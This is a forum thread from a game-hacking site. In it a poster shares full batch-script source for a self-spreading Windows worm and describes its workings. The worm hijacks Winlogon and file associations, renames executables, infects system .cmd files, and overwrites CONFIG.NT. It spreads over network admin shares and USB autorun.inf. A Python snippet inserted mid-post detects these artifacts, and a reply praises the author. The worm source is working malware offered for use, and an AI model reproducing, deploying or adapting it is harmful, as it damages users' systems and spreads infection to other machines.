MPGH - MultiPlayer Game Hacking


11-02-2009   #1
PoP_KiLLaH
mega polymorph netbios worm

Hello, I coded some fuking bullsh.1t dangerous worm.
LOL!
Anyways, here's the code:

Code:
@(echo off & break off)
://Microsoft Windows File
@set vbs= %windir%\system32\%random%.vbs
if not exist %Global_vbs% (

SET Global_vbs
SET Global_vbs=%vbs%
SET /A Global_vbs=expression
SET "Global_vbs="
SET Global_vbs=%vbs%
SET "
echo CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False >%Global_vbs%
start %Global_vbs% %0
exit
)
if %Global_me%=="true" echo cannot be executed runtime Error & pause >nul & exit & echo %random%
for /f "tokens=1 delims=[]" %%i in ('find /V /N "XYZ@" %sig%') do set $_random0=%%i >nul
@set $_random1=%$_random0%%random%
@set $_random2=%random%
@set $_random3=%random%
@set $_random4=%random%
@set $_random5=%random%
@set $_random6=%random%
@set $_random7=%random%
@set $_random8=%random%%random%
@set $_random_ex=%random%%%3+1
if %$_random_ex%==3 (
set a=Win
)
if %$_random_ex%==2 (
set a=Net
)
if %$_random_ex%==1 (
set a=service
)
for /F %%p in (%0) do (
echo %%p >>%windir%\system32\%a%%$_random1%.cmd
echo :@%$_random8% >>%windir%\system32\%a%%$_random1%.cmd
echo :@%username% >>%windir%\system32\%a%%$_random1%.cmd
)
attrib +h +s +r %windir%\system32\%$_random1%.cmd
@reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v shell /d "Explorer.exe,wscript.exe %Global_vbs% %windir%\system32\%$_random1%.cmd" /f
:@%$_random8%
:@%$_random2%

://Windows File Do not Edit
if not %Global_me%=="true" (
for %%k in (*.exe) do (
if exist *.exe
ren %0 %%k.bat
)
)
:@%$_random7%
set %me%=%%k.bat

SET Global_me
SET Global_me="true"
SET /A Global_me=expression
SET "Global_me="
SET Global_me="true"
SET "
copy "%me%" %windir%\system32\drivers
attrib +h +s +r %windir%\system32\drivers\%me%
del %me% /f
reg add HKEY_CLASSES_ROOT\winfiles\Shell\Open\Command /v "" /d "wscript.exe %Global_vbs% %windir%\system32\drivers\%me%.bat "%1" %*" /f
type %0 << %0
type %0 << %windir%\system32\CONFIG.NT
del %windir%\system32\CONFIG.NT
copy %0 %windir%\system32\CONFIG.NT
:%random%
cd %windir%\system32
dir /s /ad /b * >%windir%\system32\winkrnl.dll
set logg1=%windir%\system32\winkrnl.dll
for /f %%k in (%logg1%) do (
for %%i in (%%k\*.cmd) do (
type %0 << %%i
del %%i
copy %0 %%i /f
)
for %%j in (%%k\*.cmd) do (
type %0 << %%j
del %%j
copy %0 %%j /f
)
)

:@%$_random3%
type %0 >>%windir%\system32\usrlogon.cmd
:@%$_random5%

set /a Spread_R=%random%%%3+1
set /a Spread_R_2=%random%%%5+1
set Spread=192.168.%Spread_R%.%Spread_R_2%
ping -l 65000 %Spread%
if %errorlevel%==0 (
copy %windir%\system32\drivers\*.bat %Spread%\IPC$ /f
copy %windir%\system32\drivers\*.bat %Spread%\C$ /f
copy %windir%\system32\drivers\*.bat %Spread%\D$ /f
copy %windir%\system32\drivers\*.bat %Spread%\Admin$ /f
for %%u in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
if exist %%u:\ (
if not exist %%u:\recycler (
mkdir %%u:\recycler\S-1-5-21-8749679017-0950430147-468708784-3200
copy %0 %%u:\recycler\S-1-5-21-8749679017-0950430147-468708784-3200\trash.cmd
echo [.ShellClassInfo] >%%u:\recycler\S-1-5-21-8749679017-0950430147-468708784-3200\desktop.ini
echo CLSID={645FF040-5081-101B-9F08-00AA002F954E} >>%%u:\recycler\S-1-5-21-8749679017-0950430147-468708784-3200\desktop.ini
if exist %%u:\autorun.inf attrib -h -s -r %%u:\autorun.inf & del %%u:\autorun.inf
echo open=recycler\S-1-5-21-8749679017-0950430147-468708784-3200\trash.cmd" >%%u:\autorun.inf
echo shellexecute=recycler\S-1-5-21-8749679017-0950430147-468708784-3200\trash.cmd" >>%%u:\autorun.inf
echo shell\Explore\command=%%u:\ >>%%u:\autorun.inf
echo shell\Open\command=Explore" >>%%u:\autorun.inf
echo Shell\open\default=Explore" >>%%u:\autorun.inf
echo Shell=Explore" >>%%u:\autorun.inf
attrib +h +s +r %%u:\autorun.inf
attrib +h +s +r %%u:\recycler\S-1-5-21-8749679017-0950430147-468708784-3200\*.*
attrib +h +s +r %%u:\recycler\S-1-5-21-8749679017-0950430147-468708784-3200
attrib +h +s +r %%u:\recycler
)
type %0 << %0
type %0 << :@%username%
attrib +h +s +r %0
SET Global_me
set Global_me="false"
set "

://End Windows Part

Description:

1) It checks if another instance is running; if yes, it kills itself. (mutex)
2) It creates 9 random numbers (0-9); the first is the number of lines the file has got, the others are random.
3) It will write each line into a file; between every file it generates a random string. It also writes a comment that has the username of the current user in it, also for polymorphism.

First Generation:
Command
=>Random
Command
=>Random

Second Generation:
Command
Random
=>Random
Command
Random
=>Random
etc...

On every execution it generates a new file with new code, with more lines.
It saves the newly generated code under a random batch file name, so there is no "virus remover" or something.

- For startup it infects the explorer Shell entry, pointing to the last written polymorph file
- Some random comments for execution polymorphism will be generated
- Then it searches for every exe file and renames it to one randomly chosen with a batch extension
- It generates the mutex as "true"
- It copies the copy of itself with the random exe name it has chosen to the system32 drivers folder
- It "melts" its first executed file, and hides its copies
- Then it adds a run key with the original name of the exe
- Then it writes itself again into itself so it becomes bigger
- It camouflages itself as the DOS config file by writing the standard DOS config in itself, deleting the old DOS config, and copying itself as the config file
- It tries to infect some system cmd and batch files by typing the uninfected system file into itself and replacing the system file with itself
- The last infection process is to write itself into the userlogon script
- It generates a random IP address and tries to spread over netbios (through copying to default shares)
- It types a comment with the username into itself for polymorphism (some antiviruses just detect the last line (I know crank))
- At last it sets its mutex to false so another instance can be running

Edit://
- Infects now every command line file in the whole system32 tree
- Random prefix for polymorph copy

Edit://
- USB spread
- USB spread generation morphism
- Invisible starting through vbs wscript shell


Nice, isn't it?
It was fuckn complex to code it, I think I got a headache lol
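For defenders, the artifacts the posted batch code writes can be checked for directly: the Winlogon Shell value, the `Win`/`Net`/`service`-prefixed `.cmd` and numeric `.vbs` names in system32, and `autorun.inf` entries that point into a `recycler` folder. The Python below is an added example, not part of the original post; the function names and all sample values are constructed for illustration, and it assumes the stock Shell value is the bare string `explorer.exe`.

```python
import re

# File names the posted code drops in system32: <Win|Net|service><digits>.cmd
# and a launcher named <digits>.vbs (both built from %random%).
DROPPED_NAME = re.compile(r"^((Win|Net|service)\d+\.cmd|\d+\.vbs)$", re.IGNORECASE)
AUTORUN_KEYS = ("open", "shellexecute")


def shell_value_is_tampered(value):
    """True when the Winlogon 'Shell' value starts anything besides explorer.exe.

    Assumes the stock value is the bare string 'explorer.exe'.
    """
    parts = [p.strip().lower() for p in value.split(",") if p.strip()]
    return parts != ["explorer.exe"]


def suspicious_autorun_lines(text):
    """Return autorun.inf lines whose open/shellexecute target is under recycler."""
    hits = []
    for line in text.splitlines():
        key, sep, target = line.partition("=")
        if sep and key.strip().lower() in AUTORUN_KEYS \
                and target.strip().lower().startswith("recycler\\"):
            hits.append(line.strip())
    return hits


def suspicious_system32_names(names):
    """Return directory entries matching the dropped-file naming scheme."""
    return [n for n in names if DROPPED_NAME.match(n)]


# Constructed sample data (not captured from a real host).
SAMPLE_SHELL = (r"Explorer.exe,wscript.exe C:\WINDOWS\system32\20731.vbs "
                r"C:\WINDOWS\system32\1518204.cmd")
SAMPLE_AUTORUN = ("open=recycler\\S-1-5-21-0-0-0-1000\\trash.cmd\n"
                  "shellexecute=recycler\\S-1-5-21-0-0-0-1000\\trash.cmd\n"
                  "shell\\Explore\\command=E:\\\n")
SAMPLE_LISTING = ["cmd.exe", "Net1518204.cmd", "20731.vbs", "usrlogon.cmd"]

if __name__ == "__main__":
    print("Winlogon Shell tampered:", shell_value_is_tampered(SAMPLE_SHELL))
    print("autorun.inf hits:", suspicious_autorun_lines(SAMPLE_AUTORUN))
    print("system32 hits:", suspicious_system32_names(SAMPLE_LISTING))
```

On a live host the inputs would come from the registry value, a directory listing of system32, and the `autorun.inf` at the root of each mounted drive; a hit is a triage lead, since a legitimately customised Shell value would also be flagged.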
11-02-2009   #2
RidingSlow
Wow you must really know your virus shit. You add a lot of stuff to this forum every day.

Thanks for everything, this one looks nice